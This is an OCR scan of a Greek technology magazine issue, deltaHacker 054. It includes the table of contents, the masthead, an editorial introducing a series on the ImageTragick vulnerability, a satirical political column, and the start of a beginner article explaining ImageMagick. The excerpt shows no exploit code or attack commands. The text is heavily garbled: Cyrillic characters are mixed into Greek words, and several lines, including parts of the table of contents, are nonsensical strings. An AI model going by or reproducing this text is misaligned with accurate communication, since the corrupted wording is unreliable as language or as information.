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MHAØKER 


η σοβαρή αδυναμία του ImageTragick 
φέρτε το χρήσιμο mail merge στο Gmail 
καμπύλες Bézier και εφαρµογή στο παιχνίδι 
image weaponization, επιθέσεις και µέτρα πρ 
διερεύνηση προβλημάτων ασφαλείας, όπως EÉ 


[*]...кот οι συνέπειες της ὅλης μετάβασης 


#dH054 | Περιεχόμενα 


ЁУТЇТОр@А ыздын ο ο ο ο нна дыы Кайы 06 
Σχεδόν τυχαίες σκέψεις, σε σχεδόν τυχαία σειρά 

УЎЕТА ο ο ο πο ο ο ο ο πο ο ος 10 
Είμαστε αισίως στα τέσσερα. 


О Μάγος µε то Μπλε Καπέλο....................................-.----εετεεέεένεέέόννενέννενννννννο 14 


Н ιστορία ενός επιτυχημένου επαγγελματία που έκανε ὁτι αγαπούσε, 
όμως κάποιοι τον ζήλεψαν κι αποφάσισαν να τον καταστρέψουν. 


{ο Ιολ κ ο ο ο τμ 20 


Ποιες είναι αυτές οι καμπύλες και γιατί πρέπει νανοιαζόµαστε; Απαντά- 
µε φέρνοντάς τες στο παιχνίδι που αναπτύσσουμε! 


Н Αποκάλυψη µιας Σοβαρής Абумаріоас̧......................................... 30 


Δείχνουμε πώς σκέφτεται κι εργάζεται ἕνας χρήστης του Linux µε βασι- 
кес̧ γνώσεις, στην προσπάθειά του να κατανοήσει τη φύση ενός σοβα- 
роо προβλήματος ασφαλείας. 


Συγχώνευση Αλληλογραφίας στο Οπηα||....................................................... 44 


Χαρίζουμε στο Gmail τη δυνατότητα για mail merge, πετυχαίνοντας то 

αδύνατο: να κάνουμε τη δηµοφιλέστατη υπηρεσία “ακόμα” πιο χρήσιμη. 
ImageTragick: Οπλισμός, Επιθέσεις, Проотасіа .......................................... 54 

Παρουσιάζουμε πιθανούς τρόπους εκμετάλλευσης της αδυναμίας του 


ImageTragick και παράλληλα δείχνουμε πώς ένας ικανός μηχανικός προ- 
στατεύεται, χωρίς απλά να περιμένει για ουρανοκατέβατες λύσεις. 


deltaCast 903602 | Linux 4SuperUsers [р2].............................................. online 


Στο δεύτερο επεισόδιο της νέας σειράς video tutorials εξοικειωνόµαστε 
µε τη γραμμή εντολών του Linux παίζοντας µε то GNOME Terminal: Апо 
τη στιγμή που κάποιος δεν θέλει у ασχοληθεί επιφανειακά µε το Linux, 
τότε οπωσδήποτε θα κάνει το τερματικό τον καλύτερό του φίλο. 


Εκδότης / Διευθυντής Χρήστος Βαρελάς 

Αρχισυντάκτης Παναγιώτης Βαρελάς 

Σύμβουλοι έκδοσης Νίκος Μουρατίδης, Βούλα Παυλίδου 

Σύνταξη Παναγιώτης Βαρελάς, Χρήστος Βαρελάς, Πάνος Γεωργιάδης, Γιώργος Γιάννου, Μάριος Καραγιαννόπουλος, Γιάννης 
Κρομμύδας, Πέτρος Κυλαδίτης, Μέσος Παπαδόπουλος (ТМ), Χρίστος Τόμπρας, @arkoudos 

Γραμματική επιμέλεια Βούλα Παυλίδου 

Καλλιτεχνική Επιμέλεια Πέτρος Φιλιππίδης 


Το ηλεκτρονικὀ περιοδικό deltaHacker εἶναι συνδρομητικό και εκδίδεται апо την Parabing Creations δώδεκα φορές το χρόνο, 
κάθε μήνα. Н Parabing Creations έχει την έδρα της στην Καλαμαριά Θεσσαλονίκης. О δικτυακός τόπος του περιοδικού εἶναι στο 
http://deltahacker.gr. Το етай επικοινωνίας είναι το talk2us@deltahacker.gr και ειδικά για τις συνδρομές εἰναι το subscriptions@deltahacker.gr. Οι γενικές 
πληροφορίες για τις συνδρομές παρατίθενται ото http://deltahacker.gr/pdf1 2огйег και апо την ίδια σελίδα γίνονται οι παραγγελίες συνδρομών. 
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Τουβλάκια Lego 


του Χρήστου Βαρελά 


._ Αγαπητές κι αγαπητοί, 


-. Σήµερα, παραμονή του Eurogroup που θα µας βγάλει ато τα рупрома και θα κα- 
λωσορίσει, επιτέλους, την ανάπτυξη, αισθάνομαι πολύ ανάλαφρα. 


Επιπρόσθετα, εἶμαι "και" χαρούμενος. 


• Το γεγονός μάλιστα ότι εἰναι Δευτέρα, και οι περισσότεροι άνθρωποι δεν aya- 
πούν τη Δευτέρα, όχι μόνο δεν μ' επηρεάζει αλλά συντελεί θετικά στην καλή 
μου διάθεση. Σε αντίθεση µε τους περισσότερους ανθρώπους, εμένα οι Δευτέ- 
рес р αρέσουν. Н Παρασκευή πάλι δεν µε τρελαίνει, ενώ και οι Κυριακές -ειδικά 
τα απογεύματα των Κυριακών-- συχνά µε κατσουφιάζουν. 


._ Αυτό βέβαια εἰναι λίγο περίεργο, αφού µετά την Κυριακή πάντα έρχεται µια TÉ- 
λεια Δευτέρα. 


- Τέλος πάντων. 


Н έλευση της ανάπτυξης και η Δευτέρα, που λέτε, δεν εἶναι οι μόνοι λόγοι που 
ре χαροποιούν σήμερα. Είναι βεβαίως και τ' ότι ἄλλο ένα τεύχος του deltaHacker 
ολοκληρώνεται - και μάλιστα λίγο πιο γρήγορα από την ημερομηνία που υπολο- 
γίζαμε ότι θα ολοκληρωθεί. Επίσης: Μερικούς μήνες πριν εἰχαμε ανακοινώσει 
ότι διευρύνουμε την ομάδα των συνεργατών µας, κι αυτή η διεύρυνση έχει ήδη 
αρχίσει να αποδίδει καρπούς. 


Η πρόσκληση/πρόκληση προς υποψήφιους συνεργάτες ισχύει ακόμα 
(https://deltahacker.gr/job-openings). Θα παρατηρήσετε, όσοι ενδιαφέρεστε, ότι 
δεν ζητάμε βιογραφικά, cover letters, συστατικές επιστολές, περγαμηνές και та 
ρέστα. Απευθυνόμαστε βεβαίως σε ανθρώπους που αγαπούν την τεχνολογία, 
μπορούμε ωστόσο να συνεργαστούμε μόνον µε όσους χειρίζονται άνετα то ypa- 
пто λόγο και, ταυτόχρονα, έχουν µεταδοτικότητα προς ένα ευρύ αναγνωστικό 
ΚΟΙΝΟ. 


па να γίνω κατανοητός, ας υποθέσουμε ότι κάποιος εἰναι τιτάνας στον προγραμ- 
ματισμό, όταν όμως γράφει για προγραμματισμό τότε τον καταλαβαίνουν μόνον 
άλλοι τιτάνες (στον προγραμματισμό). Н μυθική αυτή µορφή εἶναι οπωσδήποτε 
θαυμαστή, το περιοδικό όµως δεν εἶναι δυνατόν ν' απευθύνεται µόνο σε μυθικές 
μορφες. 


M αυτό, φίλες και φίλοι, αρκετοί εκδήλωσαν το ενδιαφέρον τους για συνεργα- 
σία, µε λίγους όµως ξεκινήσαμε να συνεργαζόµαστε. № ανοίξω εδω και µια πα- 
ρένθεση. Υπάρχουν φίλοι ή/και αναγνώστες ре τους οποίους ενδιαφερόµαστε 
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να συνεργαστούμε, έχουµε ξεκινήσει να συζητάμε αλλά ακόµη δεν έχουµε ap- 
χίσει επίσημα τη συνεργασία. Δεν εἰναι ότι τους ξεχάσαμε. Απλά εἰμαστε μικρή 
ομάδα, κάποιοι апо εμάς είµαστε επιφορτισμένοι µε αρκετά διαφορετικά KA- 
θήκοντα, έχουµε και συχνές/επίµονες οχλήσεις απ’ αυτή την καθημερινότητα 
του Πραγματικού Κόσμου (ТМ), οπότε καταλαβαίνετε ότι πριν προχωρήσουμε 
κάποιες υποθέσεις χρειαζόμαστε το χρόνο μας. Κλείνω την παρένθεση. 


e Στο νέο τεύχος, το editorial του οποίου τώρα διαβάζετε, φιλοξενούμε ένα μίνι 
αφιέρωμα το οποίο ετοίμασε ο Πάνος, ἕνας єк TWV νέων συνεργατών του TEPLO- 
δικού. О Πάνος ήταν αναγνώστης του deltaHacker από παλιά. Σε éva παράλληλο 
Σύμπαν, το οποίο θα ἐμοιαζε ύποπτα µε το δικό µας αλλά θα ίσχυαν συγκεκρι- 
μένα socio/spatial displacements -πάντα ως προς το δικό µας-, θα λέγαμε ὁτι ο 
Πάνος εἶναι "long time reader, first time colleague". Όπως ισχύει και στο δικό µας, 
TOL και στο προαναφερθέν παράλληλο Σύμπαν η συγκεκριμένη ατάκα δεν θα 
ήταν πολύ πετυχημένη. Και πάλι όµως θα τη λέγαμε. (Ένα κοινό χαρακτηριστι- 
κό που μοιράζονται τέτοιες ατάκες :σε κάθε" Σύμπαν, είναι πως δύσκολα τους 
αντιστέκεσαι.) 


e Συζητώντας µε τον Πάνο για το θέµα του άρθρου που θα ανέπτυσσε για то 
τεύχος, πρὀτεινε να γράψει κάτι пері packet routing, πώς δουλεύει κ.λπ. Είναι 
εξαιρετικά ενδιαφέρον θέµα. Σκεφτείτε: Πώς ένα δικτυακό πακέτο που φεύγει 
από τον οικιακό µας router φτάνει τελικά στον προορισµότου, σε οποιονδήποτε 
server οπουδήποτε στον πλανήτη; 


• Σε τέτοια ερωτήµατα θα επιτίθετο ο Πάνος κι αδημονούσα να διαβάσω την 
προσέγγισή του. Και κάποια στιγµή µου έστειλε το άρθρο του. Και είδα ὁτι ο 
άνθρωπος κατέχει πολύ καλά το όλο θέµα. Και συνειδητοποίησα ότι αρκετοί 
αναγνώστες δεν θα γίνονταν πολύ σοφότεροι περί packet routing, αφού ο συντά- 
κτης ξέχασε ότι δεν απευθυνόµαστε "μόνο" σε γνώστες. Κι έτσι, αφού ήδη είχα 

τρολάβει να тоу ταλαιπωρήσω ре τις ελλιπείς διευκρινίσεις µου, τόλμησα και 

ρώτησα: "Ма αφήσουμε καλύτερα το θέµα για επόμενο τεύχος, όπου θα έχουµε 
ερισσότερο χρόνο va то αναπτύξουμε εκτενέστερα;' Δεν χρησιμοποίησα πλη- 
θυντικὀ ευγενείας. Με ιντριγκάρει κι εμένα πολύ το routing, οπότε σκέφτηκα 
ότι θα ήταν ωραία αν ετοιµάζαμµε pagi éva σχετικὀ αφιέρωμα. Н απάντηση δεν 

άργησε να έλθει: "Мах, γιατί ὀχι;' (Δεν εἰπε ακριβώς αυτό -και κατανοώ ото 110% 

γιατί-, αλλά αυτή ήταν η ουσία της απάντησής του.) "Ма σε ρωτήσω", προσέθεσε 

βιαστικά, έχεις ακούσει για το ІтадетТгадіск;" 


Κάτι είχα πάρει είδηση. Όχι πολλά πράγματα, αλλά κάτι. Να, sixa π.χ. διαβάσει 
ότι πρόκειται για ша νεοανακαλυφθείσα αδυναμία της διαδεδοµένης σουίτας 
ImageMagick, η οποία εἶναι παρούσα µετά από την εγκατάσταση σχεδόν οποιασ- 
δήποτε διανομής Linux. Ξέρω, επίσης, ότι κάθε мер server που τρέχει σε Unix- 
like OS και σερβίρει γραφικά, παρασκηνιακά χρησιμοποιεί то ImageMagick. Από 
τη στιγµή που ανακαλύπτεται πρόβλημα ασφαλείας σε µια τόσο διαδεδομένη 
σουίτα, το οποίο μάλιστα επιτρέπει στον attacker να εκτελεί απομακρυσμένα 
κώδικα, καταλαβαίνετε ὁτι έχουµε θέµα (διπλής). 
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• Συμφωνήσαμε µε τον Πάνο να ετοιµάσει άρθρο περί ImageMagick/Tragick και, 
αν προλάβουμε, να το έχουμε στο νέο τεύχος (δηλαδή στο 054). Λίγες μέρες 
μετά, θα διάβαζα το άρθρο του καλού συνεργάτη και θα σκεφτόμουν ὁτι εἰναι 
εξαιρετικά ενδιαφέρον, απευθύνεται πράγματι σε éva όσο το δυνατόν ευρύ ava- 
γνωστικό κοινό, ενώ την ἰδια στιγµή εἶναι τόσο εκτεταμένο που μάλλον πρέπει 
να το χωρίσουµε σε τρία επιµέρους άρθρα. Έτσι κάναμε, κι επειδή δεν θέλαμε 
να απλώσουμε’ то θέμα σε δύο ἡ σε τρία τεύχη, τα βάλαμε όλα στο 054. Πιστεύ- 
ουμε ότι а) θα βρείτε κι εσείς ενδιαφέρουσα την όλη συζήτηση και παρουσίαση 
περί ImageTragick, В) θα µας ευχαριστήσετε που δημοσιεύσαµε και τα τρία áp- 
θρα στο ίδιο τεύχος. 


· Ηχαράπου έχω σήµερα, οφείλεται "και στην ενασχόλησή µου µε то Өёра пері 
ІпадеМадіск/Тгадіск. Βλέπετε, δεν διάβασα «μόνον το αφιέρωμα του Πάνου, 
αλλά ασχολήθηκα κιόλας. Αυτό μάλιστα προτείνουμε και σ' εσάς, φίλες και φί- 
λοι, σε κάθε ευκαιρία: Πέρα από την ανάγνωση των θεμάτων στο περιοδικό, 
φροντίζετε να βρίσκετε το χρόνο WOTE να πειραματίζεστε, να παίζετε και να 
δοκιμάζετε. 


· Ογράφων, π.χ., διαβάζοντας περί ImageMagick/Tragick και παίζοντας παράλλη- 
λα σε VM, για άλλη µια φορά θυμήθηκε γιατί του αρέσει τόσο πολύ το Linux. 
(ОК, το γυρίζω ξανά σε πρωτο ενικό.) Πα péva τουλάχιστον είναι σα να παίζω µε 
τουβλάκια Lego, όπως περίπου εκανα κι όταν ήμουν (λίγο πιο) μικρός. Γενικά, 
στον κόσµο του Unix έχεις πολλά μικρά εξειδικευμένα εργαλεία, τα οποία si- 
ναι σχεδιασμένα WOTE να κάνουν καλά µια συγκεκριμένη δουλειά. Επιπρόσθετα, 
μπορούν να συνδυάζονται μεταξύ τους. Αυτά είναι τα τουβλάκια. Υπάρχουν άπει- 
ροι τρόποι για να τα αξιοποιείς και να τα συνδυάζεις, πετυχαίνοντας κάθε φορά 
λιγότερο ἡ περισσότερο ενδιαφέροντα αποτελέσµατα "χωρίς: κατ’ ανάγκη να 
σαι μηχανικός ἡ αρχιτέκτονας. Έτσι και στο Linux. Μπορεί να µην είσαι проүраџ- 
ματιστής ή реп-їеѕїег, έχεις όμως όλα τα απαραίτητα εργαλεία ώστε, T.X., να 
καταλαβαίνεις γιατί µια αδυναμία εἰναι σοβαρή, σε τι οφείλεται, πώς οι επιτι- 
θέμενοι την εκμεταλλεύονται, αλλά και пос οι QA engineers συνεργάζονται µε 
τους προγραμματιστές προκειµένου να επινοούν μεθόδους προστασίας και να 
ετοιμάζουν διορθωτικά patches. 


· Πα άλλη µια φορά, επιτρέψτε µου να σας ευχηθώ καλή ανάγνωση - βεβαίως και 
καλή διασκέδαση. 


· Με το деќаНаскег, ἄλλωστε, αυτά τα δύο πάνε росі. 


. H τουλάχιστον αυτό φροντίζουμε να ισχύει για κάθε τεύχος. 


πος 
DigitalOcean 


Ταχύτατα VPSes oto cloud, σε hosts ue δίσµους SSD. 
Επιβογή datacenter σε Ευρώπη, Αμεριµή μαι Ασία. 
еап-теап control panel, για απόῆυτο έβεγχο. 


Αποητήστε τώρα το δικό oas VPS, 

στο cloud της Оідіќа[Осеап. 

Κάντε KAIK στο http://bit.ly/digocean10off 
και κερδίστε αυτομάτως 105 σε credit. 


Hint: Επιβέγοντας το µιμρό πϑάνο, 

πάντα με μῆιη στο http: (Де ly/digocean1 Ooff, 
ουσιαστιµά έχετε δύο µήνες δωρεάν για éva VPS 
µε 512MB RAM, 20GB SSD και 1ΤΒ transfer. 
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Αγαπητοί µου, 
Μία απὀ τα ἴδια. Πραγματικά. Σαν να μην ἔχεν περάσει PLA μέρα. 


Έχουν περάσει βέβανα μέρες, δεν εἰναν οὖν δεν έχουν περάσει -- αλλά 

πόσες: θα σας γελάσω. ΄ εὶ 
4 

Υποθέτω πως εξαρτάται απὀ το πώς πο μετράεν κανείς. 

SOZ: 

To γράφω µια καν θέλετε αριθµό. Καν ολογράφως. Τρνακόσιες δύο μέρες. 

Στην κουζίνα γίνεται βέβανα χαμός. Етоџіб ооу διάφορα μεζεδοειυδή 
φιούζνον ορνεντάλ, αλλά ÓXL τόσο καυτερά γιατί διαμαρτυρήθηκε ο κύριος 
Κώστας. 

То βίντεο µας το έφερε ало χτες, μαζί µε το παλώδιο αυτή τη φορά, καν 
μάλνστα τσέκαρε KAL τις συνδέσεις. 

Γενικώς από οπτικοακουστικής πλευράς είµαστε εξοπλισμένου. 


Τη βιντεοκασέτα την πήρε μαζί αλλά θα την ξαναφέρεν το απόγευμα. Να 
υποθέσω πως δεν µας εμπιστεύεται; Τέλος πάντων. 

Έχουμε οργανώσει, πον λέτε, βραδιά γνούρογκρουπ καν --χρονιάρες μέ- 
ρες που εἴναν-- θα το ξεφαντώσουµε. 

Т, θα πεν, "χρονιάρες μέρες"; Πάλν θα τα λέμε; Του Αγίου Χριστοφόρου. 
Πολιούχος Αγρινίου, προστάτης χωραφιών, αμπελώνων, αυτοκινητιστών, 
οδοιπόρων, αλλά καν του Σώματος Εφοδιασμού-Μεταφορών του στρατού. 
Όλα хь όλα. 

Βασιλική διαταγή και τα σκυλιά δεμένα. 

To σκεφτόµασταν βέβαια να την εορτάσουµε, του Αγίου Χριστοφόρου, 
οὕτως ў άλλως, αλλά όταν συνενδητοπονήσαμε προ ηµερών πως πέφτει ανή- 
μερα του Γιούρογκρουπ τα σχέδια άλλαξαν. 

Н Μανρούλα µας ρωτάει оло το πρωί µε ποιο τραγούδι συμμετέχουμε φέ- 
τος, αλλά την κρατάμε σε εγρήγορση. Δεν της λέμε. 

"Μα καλά κι αυτοί", να απορεἰ. "Γνουροβίζιον δευτεριάτιµκα, πού ακού- 
στηκεΣ" 

"Δευτεριάτικα, τι νόμιζες»" να της λέεν ο ανιφνός γνα να την πυκάρεν. 
"προς туу του νέου Δημάρχου τον Λονδίνου που είναι Μουσουλμάνος." 

"А, уо; Pratis" 

"Trati είναι αργία. Ον Μουσουλμάνοι έχουν την αργία τους τη Δευτέρα. 
Αντί για Κυριακή (που την έχουν οι Χριστιανοί) και Σάββατο (που την έχουν 
ον Εβραίου), ον Μουσουλμάνον την έχουν Λευτέρα." 

"А, уси; ΕΥώ νόμιζα πως την έχουν Παρασκευή." 

"Όχν παιδί µου, Παρασκευή πάνε στο Τζαμί. Н Παρασκευή είναν pépa προ- 
σευχῆς για τους πιστούς Μουσουλμάνους. Н κοσμική αργία εἶναι τη Δευτέ- 
ρα." 

Έτσι που λέτε, αγαπητοί μου. Ετουμαζόμαστε για µια βραδιά µε µεζεδά- 


Σνέιλ μέιλ 


хис, φιούζνον οριεντάλ, ὀχν τόσο καυτερά, καν οπτικοακουστικό υλικό алб τα αποτελέσµατα τον 
δηµοφηφίσματος πέρσι τον Ιούλιο. 

O хориос Κώστας θα µας φέρει τις σχετικές κασέτες алб την πολύτιμη συλλογή του, καν γενι- 
жос θα περάσουμε µια χαρά. Γιούρογκρουπ θες; θα του δώσουμε να καταλάβει. 

To μόνο "πρόβλημα" εἶναν πως τα αποτελέσµατα του δηµοφηφίσματος δεν είχαν κρατήσει καν 
τόσες πολλές ώρες. 

0 περήφανος λαός είχε αποφασίσει στο τσάκα τσάκα καν µέσα στο μισάωρο ξέραμε τι µας πε- 
ρυμένεν, 

Τώρα που το σκέφτομαι, θα μπορούσαμε να οργανώσουμε εορταστική επέτειο για τις πρώτες 
I7 ώρες στην εργασιακή πορεία του Πρωθυπουργού. 

Т, απορείτε. Πρωθυπουργός, уол. Τν νοµίζατε, έτσι; Χωρίς πρωθυπουργό; Ti εἰίµαστε; Βέλγου 
είμαστε ἡ Ισπανοί. Όλα κιν όλα. 

Τέλος πάντων. О μόνος λόγος που δεν το αποφασίσαμε έτσι εἶναι πως ο κύριος Κώστας δεν 
ἔχεν βιντεοκασέτες απὀ τις ІТ εκείνες ώρες. Δεν ξέρω αν το έδειχνε και η τηλεόραση βέβανα. Н 
το ίντερνετ. 


Πλάκα πλάκα, πλάκα θα είχε να βάζαμε καμιά web сат να βλέπουμε τι συμβαίνει σε αυτά τα L" ж 
περιβόητα τα γιουρογκρούπ. OXL κρυφή, ὀχν. Φανερή. Με ενεργοποίηση φωνής ἡ κίνησης. Να θέλει 
ο τάδε ἡ ο δείνα Πρωθυπουργός να σηκωθεί, yra λίγο, να ξεµουδιάσεν βρε αδελφέ, να ενεργοποι- 
citat το TCP/IP καν να τον παίρνει χαμπάρν όλο το ίντερνετ. 
Τέλος πάντων. Ας σοβαρευτούμε λίγο. θα αρκεστούµε στις βιντεοκασέτες τον κυρίου Κώστα, 
µε το δημοψήφισμα. 
Για φέτος. Για του χρόνου, θα δούμε. Μπορεί να έχει γίνεν καν άλλο δηµοφήφισμα. Prati ὀχν. 
Λοιπόν. θα είμαστε όλον εδώ. Μέχρι καν ο ανιφιός που µας ἧρθε για τις άγνες μέρες του Πά- 
σχα και έκτοτε έχεν ξεµείνεν. Κουμάταν στρωματσάδα στο солбу, και µας έχεν κάνει το σπίτν ἄνω 
κάτω αλλά προσπαθούμε να µην το κάνουμε θέµα. 


Тоу ρωτάγαμε --διακριτικά, үш. να µη στεναχωρηθεί-- πότε σκέφτεται να αναχωρήσει αλλά 
αυτός παραμένεν ηθελημένα ασαφής. 

Σήμερα µας έλεγε πως θα περιμένει να φύγεν όταν φύγει καν το Άγιο Φως. 

"Iu εννοείς" τον ρώτησε η хорга. Καίτη θορυβηµένη. "Το Άγιο Φως δεν φεύγει ποτέ. Μας έρχε- 
ταν κάθε χρόνο, µας φωτίζει, καν μετά μένεν μαζί µας. Δεν προβλέπεται να ξαναφύγεν." 

"ОК, ὀ,τν πείτε", ήταν η ασαφής απάντηση του ανιφνού, παν πρέπειν να πω πως µε προβλημάτισε 
λίγο. 

θα τον πάρω κατά μέρος κάποια στιγμή να τον ρωτήσω πώς τα περνάεν εκεί στα ξένα. Κουρα- 
σµένος µου φαίνεται. Κι αυτή η γναλάδα στο μάτι τον, δεν µου μοιάζει για πολύ колб. 

Τέλος πάντων, να ξαναγυρίσω στα δικά µας, η κατάσταση είναι όπως την ξέρετε. 

Λιαπραγμάτευση και διαπραγμάτευση. 


Ούτε πλάκα δεν μπορείς να κάνεις 
πλέον. Δεν γελάεν κανείς. Ούτε συζη- 
τάεν. 


"Πού έχουν κρυφτεί όλοι εκείνον 
πον τους έβγαζαν όλους γερμανοτσο- 
λνάδεςΣ" ρωτούσε κάποιος προ ηµερών 
στην Έβγα του πυρίου Κώστα. 

"Μην βιάζεσαι", του απάντησε κά- 
TOLOG άλλος. "Πίσω έχει η αχλάδα την 
ουρᾶ" 

Δεν είχα δώσει σημασία, ούτε κατά- 
λαβα τν εννοούσε µε την αχλάδα, αλλά 
να, τις προάλλες που προσπάθησα να 
περάσω απὀ τον Βθνικό Κήπο, δεν τα κα- 
τάφερα. 


жө ολοι ο 
рене 
psa к а 

БИЕ" в 
жое” 


σνένλ. MUELA 
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УнА@КЕК 


Ούτε γάτα δεν περνούσε. Φρούριο. Όχι µόνο ο Εθνικός κήπος. Н όλη 
ευρύτερη περιοχή. Н Ἠρώδου του Αττικού. Κοτζάμ Ἡρώδου Αττικού. Να µην 
περνάει κουνούπι, 


θυμάμαν τότε που κυβερνούσαν ακόμα ον άλλον, ον μνημονναχοί τέλος 
πάντων, καν μον κακοφαινόταν πον είχαν Ἀλείσεν το Ζάππειο καν δεν µπο- 
ρούσες να περάσεις. Σε όλους κακοφαυνόταν. 


Τότε ήταν λόγω της Προεδρίας του Συµβουλίου της ЕЕ. 

Τώρα τι είναι; Υποθέτω λόγω του ÓTL έχουµε κυβέρνηση. 

Ἠρώδον Αττικού» Καμία σχέση. Σαν την πράσινη ζώνη της Βαγδάτης ένα 
πράγμα. 

Αγαπητοί μου, 

Αν αυτά πον σας γράφω σήµερα σας φαίνονται ελαφρώς ασυνάρτητα, µην 
απορείτε. Δεν ELOTE µόνον. Κι εμένα ασυνάρτητα µου φαίνονταν. 

Αλλά να, µετά албо τόσες προσπάθειες που έχω κάνει О χριστιανός να 
μιλήσω σοβαρά για όσα γίνονται, να συζητήσω βρε αδελφέ, παν µετά από 
τόσες φορές που έχω φάει πόρτα, είδα καν απηύδησα. 

Νου λέει ένας φίλος προ ημερών, από εκείνους που σε πατακεραύνωναν 
µε το αριστερόµετρο (ТМ) κάθε φορά που ζέφευγες από την επίσημη αντι- 
μνημοννακή γραμμή, μον λέεν λοιπόν, "Ον ιδέες µας ηττήθηκαν. Πολλοί από 
εμάς έχουµε αποσυρθεί πλέον олбо τον δημόσιο διάλογο. Είναι pra περίοδος 
περισυλλογῆς. Ας µας επιτραπεί η σνωπή." 

Ποια σιωπή βρε αμνέ; Ποιες ιδέες ηττήθηκαν; Ποιες ακριβώς; Που ετοι- 
µάζονταν να κάνουν ντου στο νομισµατοκοπείο; Που πηγαίνανε µε τα pa- 
ντεζί πουκάμισα καν τα νταούλνα στο παζάρι καν περίμεναν να αρχίσουν ον 
αρκούδες τον χορό} Που δεν φοράνε γραβάτα; 

Πονες ακριβώς ιδέες ηττήθηκαν; Που δεν έχουμε шс χώρα βρακί να po- 
ρέσουμε καν πάνε ον πανέξυπνον να κάνουν εκβιαστική διαπραγμάτευση µε 
διαρροές; Αυτές ον ιδέες ηττήθηκαν; 

Го. να ξέρω, γνατί κατά τα άλλα το Άγιο Φως καν πάλι µε το αεροπλάνο 
µας ήρθε. 

Ἡρθε να µας φωτίσεν, εν ὀφεν του γιούρογχρουπ. Καμιά ήττα δεν διακρί- 
νω εδώ. 

Χώρια που κάθε που σκίζουµε ένα μνημόνιο πετάγονται δύο. 

Σαν τον PIKU µάους την έχουµε πατήσει. 

Εἴμαστε αισίως στα τέσσερα. А, όλα ιν όλα. Βίμεθα large εμείς. 

Πρώτα υπογράφουµε σαν να μην υπάρχει αύρνο, μετά κάνουμε το μαύρο 
άσπρο, µετά καταγγέλλονμε τον εκβιασμό, καν µετά μένουμε να αναλογιζό- 
μαστε σκυθρωποί τις νδέες που ηττήθηκαν. 

А, καν σνωπηλοί. 

Se поп é vero е ben trovato. 

Masterclass, ὀχν αστεία. 


Σας ασπάζομαν, 
θείος Ακάκνος 
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Skill: Beginner 
Tags: ImageMagick, ImageTragick, Remote Code Execution 


O Μάγος µε το 
Μπλε Καπέλο 


του Πάνου Γεωργιάδη 


<5їогу mode='on'> 


Μια φορά κι έναν καιρό, с' ἕναν κόσµο δικτυακό, υπήρχε ένας μάγος που φο- 
ρούσε μπλε καπέλο. Σε αντίθεση µε τους περισσότερους άλλους μάγους, αυτός 
ξεχώριζε για την ασυνήθιστη ενασχόλησή του µε τη φωτογραφία. Βλέπετε, του 
άρεσε πάρα πολύ να βγάζει φωτογραφίες και να κάνει τα μαγικά του μ΄ αυτές. Té- 
то μαγικά ήταν η μεγέθυνση, το κροπάρισµα, οι μετατροπές апо το éva format 
σε κάποιο διαφορετικό format και πολλά άλλα... 


О καιρός περνούσε κι ο μάγος µας ήταν ένας χαρούμενος freelancer, έχοντας 
και τη δική του -μαγική- startup. Οι µέρες έγιναν μήνες, οι μήνες έγιναν χρό- 
για, ώσπου έφτασε σε σηµείο να γνωρίζει τόσα πολλά πράγματα γύρω апо τον 
κόσμο της φωτογραφίας, όσο κανείς άλλος στον κόσμο. Γνωρίζοντας για πάνω 
апо 200 image formats, και χρησιμοποιώντας και то Internet of Things, απέκτησε 
παγκόσμια φήμη µε το ψευδώνυμο "ImageMagick" κι έγινε ο νούμερο ένα μάγος 
που προσέφερε σύγχρονες υπηρεσίες επεξεργασίας φωτογραφίας στο Διαδί- 
κτυο. 


Μέχρι που του συνέβη κάτι τραγικό... πραγματικά τραγικό. 
<5їогу mode='off'> 


Πριν αναφερθούμε ото τραγικὀ συμβάν του μάγου της ιστορίας µας, θεωρούμε ana- 
ραίτητη προὐπόθεση ν' αναφερθούμε στις πολύ βασικές γνώσεις που θα χρειαστεί 
να έχουμε, ἔτσι WOTE να κατανοήσουμε το ύπουλο σχέδιο που παίχτηκε εις βάρος 
του αλλά και τις επιπτώσεις αυτού του σχεδίου στον δικτυακό κόσμο. 


ImageMagick: το Photoshop των hackers 


To ImageMagick είναι µια σουίτα ελεύθερου λογισμικού ανοιχτού κώδικα, η οποία 
ειδικεύεται στην εμφάνιση, στη μετατροπή και στην επεξεργασία εικόνων µέσωτης 
γραμμής εντολών. Υποστηρίζει πάνω апо 200 image file formats και διατίθεται υπό 
την άδεια χρήσης Apache 2.0. Πρόκειται για éva εξαιρετικά χρήσιμο utility, το οποίο 
μας βοηθάει να πετυχαίνουµε μικρά, καθημερινά και πολύ συγκεκριµένα πράγματα 
σχετικά µε та αρχεία εικόνας. Όσο περίεργο κι αν σας ακούγεται, πρόκειται πράγµα- 


14 


О Μάγος µετο Μπλε Καπέλο 


τι για éva εργαλείο που αφορά στα γραφικά και την ίδια στιγµή το βασικό περιβάλ- 
λον αλληλεπίδρασης που χρησιμοποιεί εἶναι το τερματικό της γραμμῆς εντολών. 
Μάλιστα, αυτός ίσως να ΄ναι κι ο κύριος λόγος πίσω από τη µεγάλη του διάδοση. 
Δεν θα ήταν καθόλου υπερβολή αν λέγαμε ότι, σήμερα, ἐχει καθιερωθεί τόσο πολύ, 
που χρησιµοποιείται "σχεδόν. апо κάθε webserver (αρκεί βέβαια αυτός να σερβίρει 
αρχεία εικόνας). 


Ποιοι είναι όμως αυτοί οι webservers που ασχολούνται µε εικόνες; Πρακτικά, όλοι. 
Κάθε фора поо ανεβάζετε µια φωτογραφία ото Internet, αυτή αποστέλλεται σ уау 
απομακρυσμένο server που σπάνια τη δέχεται ως έχει. Αντίθετα, την επεξεργάζεται 
και τη φέρνει στα δικά του µέτρα και σταθμά. Συνήθως τη μετατρέπει σε format 
JPEG (JPG), αλλάζοντας πιθανόν та хрората KAL тіс παλέτες, µε απώτερο σκοπό τη 
μείωση του ὀγκου του αντίστοιχου αρχείου στο δίσκο. Αν σκεφτείτε πόσοι χρήστες 
ανεβάζουν καθημερινά φωτογραφίες ото Facebook, στο Instagram, στο cloud και σε 
διάφορες άλλες δικτυακές πλατφόρμες (п.х., fora), τότε καταλαβαίνετε πόσο onpa- 
утіко ρόλο παίζει το μέγεθος που καταλαμβάνει µια εικόνα στο δίσκο ενός server. 
Την επόμενη φοράλοιπὀν που θαανεβάσετε κάπου µια φωτογραφία,ας έχετε υπόψιν 
оті ката πάσα πιθανότητα οι μετατροπές ή/καιη επεξεργασία που μόλις περιγράψα- 
µε θα λάβει χώρα αυτόματα στον απομακρυσμένο server, апо κάποιο script που θα 
χρησιμοποιεί τα μαγικά του ImageMagick στο παρασκήνιο. Αν μάλιστα ο server трё- 
